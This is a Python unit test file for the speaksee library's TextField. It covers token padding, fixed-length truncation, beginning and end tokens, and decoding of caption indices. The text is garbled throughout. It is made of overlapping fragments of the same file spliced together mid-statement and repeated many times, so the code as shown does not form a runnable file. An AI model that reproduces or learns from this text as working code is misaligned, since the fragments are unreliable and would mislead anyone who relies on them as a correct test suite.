"\"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7,", "= ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single", "init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are", "[\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) ==", "\"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field =", "= data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and", "\"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field =", "\".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\",", "\".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths =", "''' class TestTextField(object): def test_pad(self): # Default case. field = data.TextField() minibatch =", "3, 2, 1], [2, 1, 1, 1]] expected_output = ['a c', 'c c',", "\"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch)", "\"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3]", "field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0,", "\"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is", "'' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output", "field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def", "expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3,", "assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): # Default case. field", "[[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [", "Test fix_length properly truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\",", "'''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = '' expected_image = ''", "assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs)", "== expected_image ''' class TestTextField(object): def test_pad(self): # Default case. field = data.TextField()", "test_all_dtypes(word_idxs, expected_output) # Batch of captions word_idxs = [[0, 3, 2, 1], [3,", "expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['', ] assert", "image = '' expected_image = '' assert field.preprocess(image) == expected_image ''' class TestTextField(object):", "# Test fix_length properly truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\",", "field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"],", "\".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\",", "field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output", "field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads. field =", "expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\",", "= [[0, 3, 2, 1], [3, 3, 2, 1], [2, 1, 1, 1]]", "unittest import speaksee.data as data import numpy as np import torch '''class TestImageField(object):", "4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch)", "expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\",", "2, 1], [2, 1, 1, 1]] expected_output = ['a c', 'c c', '']", "\"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\",", "Batch of captions word_idxs = [[0, 3, 2, 1], [3, 3, 2, 1],", "assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a',", "['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption", "class TestTextField(object): def test_pad(self): # Default case. field = data.TextField() minibatch = [[\"a\",", "= data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\",", "expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly", "(expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs))", "eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field =", "import speaksee.data as data import numpy as np import torch '''class TestImageField(object): def", "case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"],", "expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test", "data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors) word_idxs", "[\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token", "coding: utf-8 -*- from __future__ import unicode_literals import unittest import speaksee.data as data", "Single caption word_idxs = [0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs,", "\"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2,", "\"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch", "assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch,", "1], [2, 1, 1, 1]] expected_output = ['a c', 'c c', ''] test_all_dtypes(word_idxs,", "Test init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\",", "\"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\",", "as data import numpy as np import torch '''class TestImageField(object): def test_preprocessing(self): field", "\"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]]", "= [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]]", "__init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field", "field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates", "\"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert", "\"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\",", "assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)", "field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\",", "= data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\",", "\"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5]", "expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert", "\"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\",", "data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]]", "as np import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image =", "= '' expected_image = '' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def", "\"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\",", "assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0, 3, 2, 1]", "field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): # Default case. field =", "# -*- coding: utf-8 -*- from __future__ import unicode_literals import unittest import speaksee.data", "\"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\",", "== expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length", "PyTorch tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs) == expected_output assert", "3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of captions", "expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch)", "Empty captions (not tested for PyTorch tensors) word_idxs = [] expected_output = ''", "[\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\",", "field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs) ==", "field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs = [0, 3, 2, 1] expected_output", "[3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch)", "[2, 1, 1, 1]] expected_output = ['a c', 'c c', ''] test_all_dtypes(word_idxs, expected_output)", "== expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos =", "data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\",", "[\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"],", "\"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch", "\"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\",", "properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]]", "= [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True)", "expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output #", "field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test", "data.ImageField() image = '' expected_image = '' assert field.preprocess(image) == expected_image ''' class", "[\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "2: eos_token, 3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions", "'' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): # Default case.", "\"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) ==", "\"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\",", "data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]]", "\"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) ==", "\"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"],", "tested for PyTorch tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs) ==", "3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch,", "[5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) ==", "[[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\",", "\"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\",", "field = data.ImageField() image = '' expected_image = '' assert field.preprocess(image) == expected_image", "[[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch", "def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs)))", "self.itos = {0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field = data.TextField()", "MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token, 3:", "== (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads. field = data.TextField(fix_length=3)", "[3, 3, 2, 1], [2, 1, 1, 1]] expected_output = ['a c', 'c", "import unicode_literals import unittest import speaksee.data as data import numpy as np import", "and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\",", "eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]]", "properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]]", "numpy as np import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image", "'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for", "2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch,", "utf-8 -*- from __future__ import unicode_literals import unittest import speaksee.data as data import", "expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0:", "= '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]]", "TestTextField(object): def test_pad(self): # Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\",", "2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) ==", "assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch,", "field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly handled. field", "\"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\",", "== expected_padded_minibatch # Test init_token is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch", "== (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert", "MyVocab(field.eos_token) # Empty captions (not tested for PyTorch tensors) word_idxs = [] expected_output", "[\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\",", "fix_length properly truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\",", "Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "\"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\",", "pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"],", "and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\",", "] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output # Single caption word_idxs", "\"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled. field", "= [0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch", "captions word_idxs = [[0, 3, 2, 1], [3, 3, 2, 1], [2, 1,", "is properly handled. field = data.TextField(fix_length=4, init_token=\"<bos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\",", "\"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths =", "__future__ import unicode_literals import unittest import speaksee.data as data import numpy as np", "data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\",", "field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"],", "data.TextField(include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test fix_length properly truncates and pads.", "\"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\",", "= data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\",", "[[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\",", "= data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and", "assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs = [[]] expected_output =", "field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\"], [\"one\",", "= [[\"a\", \"sentence\", \"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\",", "[0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) # Batch of", "\"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True)", "def test_pad(self): # Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\",", "= [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True)", "expected_padded_minibatch field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self):", "word_idxs = [0, 3, 2, 1] expected_output = 'a c' test_all_dtypes(word_idxs, expected_output) #", "word_idxs = [] expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) ==", "= {0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab", "= [] expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output", "[\"one\", \"last\", \"sent\"]] assert field.pad(minibatch) == expected_padded_minibatch # Test init_token is properly handled.", "for PyTorch tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs) == expected_output", "expected_output class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2:", "[\"yet\", \"another\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"one\", \"last\", \"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5,", "\"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch) == expected_padded_minibatch field", "[ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\",", "assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) == expected_output class MyVocab(object): def __init__(self, eos_token):", "[\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field", "3: 'c'} field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested", "[\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\",", "\".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\", \"<pad>\", \"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\",", "\"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\",", "[] expected_output = '' assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output word_idxs", "== expected_output word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output", "include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\",", "[\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert", "[\"yet\", \"another\"], [\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\",", "def test_decode(self): def test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output", "test_all_dtypes(word_idxs, expected_output): assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) == expected_output assert field.decode(torch.from_numpy(np.asarray(word_idxs))) ==", "expected_image = '' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): #", "= [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\", \"yet\", \"another\", \"<eos>\",", "3, 4] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch)", "field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field", "\"sent\", \"<pad>\", \"<pad>\"]] expected_lengths = [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field", "== (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\",", "{0: 'a', 1: 'b', 2: eos_token, 3: 'c'} field = data.TextField() field.vocab =", "\"<pad>\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4,", "properly truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\",", "data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True) expected_padded_minibatch =", "np import torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = ''", "Test init_token and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch =", "# Test init_token and eos_token are properly handled. field = data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\") minibatch", "class MyVocab(object): def __init__(self, eos_token): self.itos = {0: 'a', 1: 'b', 2: eos_token,", "# Default case. field = data.TextField() minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "[[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"], [\"<bos>\", \"one\", \"last\", \"sent\"]] expected_lengths", "field = data.TextField(fix_length=3, include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) field = data.TextField(fix_length=3, truncate_first=True)", "\"one\", \"last\", \"sent\"]] expected_lengths = [4, 3, 4] assert field.pad(minibatch) == expected_padded_minibatch field", "torch '''class TestImageField(object): def test_preprocessing(self): field = data.ImageField() image = '' expected_image =", "\"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch", "# Batch of captions word_idxs = [[0, 3, 2, 1], [3, 3, 2,", "truncates and pads. field = data.TextField(fix_length=3) minibatch = [[\"a\", \"sentence\", \"of\", \"data\", \".\"],", "[\"one\", \"last\", \"sent\"]] expected_padded_minibatch = [[\"<bos>\", \"a\", \"sentence\", \"of\"], [\"<bos>\", \"yet\", \"another\", \"<pad>\"],", "expected_output word_idxs = [[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert", "include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) # Test init_token and eos_token are properly", "\"last\", \"sent\"]] expected_padded_minibatch = [ [\"<bos>\", \"a\", \"sentence\", \"of\", \"data\", \".\", \"<eos>\"], [\"<bos>\",", "field = data.TextField() field.vocab = MyVocab(field.eos_token) # Empty captions (not tested for PyTorch", "def test_preprocessing(self): field = data.ImageField() image = '' expected_image = '' assert field.preprocess(image)", "= [5, 2, 3] assert field.pad(minibatch) == expected_padded_minibatch field = data.TextField(include_lengths=True) assert field.pad(minibatch)", "field.pad(minibatch) == expected_padded_minibatch field = data.TextField(fix_length=4, init_token=\"<bos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths)", "import unittest import speaksee.data as data import numpy as np import torch '''class", "= '' assert field.preprocess(image) == expected_image ''' class TestTextField(object): def test_pad(self): # Default", "= [[\"a\", \"sentence\", \"of\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] expected_lengths = [3,", "= [[]] expected_output = ['', ] assert field.decode(word_idxs) == expected_output assert field.decode(np.asarray(word_idxs)) ==", "unicode_literals import unittest import speaksee.data as data import numpy as np import torch", "(not tested for PyTorch tensors) word_idxs = [] expected_output = '' assert field.decode(word_idxs)", "truncate_first=True) expected_padded_minibatch = [[\"of\", \"data\", \".\"], [\"yet\", \"another\", \"<pad>\"], [\"one\", \"last\", \"sent\"]] assert", "speaksee.data as data import numpy as np import torch '''class TestImageField(object): def test_preprocessing(self):", "= data.TextField(init_token=\"<bos>\", eos_token=\"<eos>\", include_lengths=True) assert field.pad(minibatch) == (expected_padded_minibatch, expected_lengths) def test_decode(self): def test_all_dtypes(word_idxs,", "-*- from __future__ import unicode_literals import unittest import speaksee.data as data import numpy", "\"one\", \"last\", \"sent\", \"<eos>\", \"<pad>\", \"<pad>\"]] expected_lengths = [7, 4, 5] assert field.pad(minibatch)", "assert field.pad(minibatch) == (expected_padded_minibatch, 